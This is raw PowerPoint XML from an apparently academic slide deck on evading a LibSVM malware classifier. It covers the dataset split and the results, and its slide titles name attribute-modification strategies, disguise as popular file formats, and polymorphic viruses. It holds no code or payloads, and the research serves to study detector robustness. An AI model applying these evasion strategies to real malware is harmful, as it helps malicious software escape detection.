                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8838902" y="4330741"/>
            <a:ext cx="1719609" cy="2185017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17070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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0"/>
              <a:t>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1384995"/>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p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: benign	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: malicious</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186057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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Randomly pick instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>80% as Training set (total: 298  +: 59  -: 239)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>20% as Test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>set	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>      (total: 75    +: 13  -: 62  )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Remove the “-1” at the end of each instance to meet the input requirement of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>LibSVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1780812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training</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1854921" y="2133600"/>
            <a:ext cx="10018424" cy="3777622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Assumption: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>raining set &amp; SVM model is known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>odify the test set to escape detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Test with original test set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Accuracy: 98.6667% (74/75)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2646364"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Training Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8728076"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en-US" sz="3200" smtClean="0"/>
              <a:t>Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475164" y="3846637"/>
            <a:ext cx="4252912"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8355" y="3308028"/>
            <a:ext cx="1606530" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>LibSVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1390638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3802</TotalTime>
  <Words>1245</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>219</Paragraphs>
  <Slides>32</Slides>
  <Notes>11</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Century Gothic</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>幼圆</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wisp</vt:lpstr>
      <vt:lpstr>Evading the Machine Learning Detector: A Virus’ Perspective</vt:lpstr>
      <vt:lpstr>Problem Description</vt:lpstr>
      <vt:lpstr>Malicious Executable Dataset</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>Workflow</vt:lpstr>
      <vt:lpstr>Workflow</vt:lpstr>
      <vt:lpstr>Data Preprocessing </vt:lpstr>
      <vt:lpstr>Data Preprocessing</vt:lpstr>
      <vt:lpstr>Model training</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Naïve Modification : Adding Single Attribute</vt:lpstr>
      <vt:lpstr>Instance modification strategy (1)</vt:lpstr>
      <vt:lpstr>Instance modification strategy (2)</vt:lpstr>
      <vt:lpstr>Test Result: Adding Highest N Attributes</vt:lpstr>
      <vt:lpstr>Test Result: Removing Lowest N Attributes</vt:lpstr>
      <vt:lpstr>Test Result: Combined</vt:lpstr>
      <vt:lpstr>vs. Existing Hiding Schemes</vt:lpstr>
      <vt:lpstr>Disguise as Popular File Formats or Programs</vt:lpstr>
      <vt:lpstr>Disguise as Popular File Formats or Programs</vt:lpstr>
      <vt:lpstr>Polymorphic Virus</vt:lpstr>
      <vt:lpstr>Other Existing Hiding Schemes</vt:lpstr>
      <vt:lpstr>Reference</vt:lpstr>
      <vt:lpstr>Conclusion &amp; Future Work</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>Methods</vt:lpstr>
      <vt:lpstr>Originality</vt:lpstr>
      <vt:lpstr>Originality</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>Challenge</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249</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-22T19:51:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-14T00:48:13Z</dcterms:modified>
</cp:coreProperties>
</file>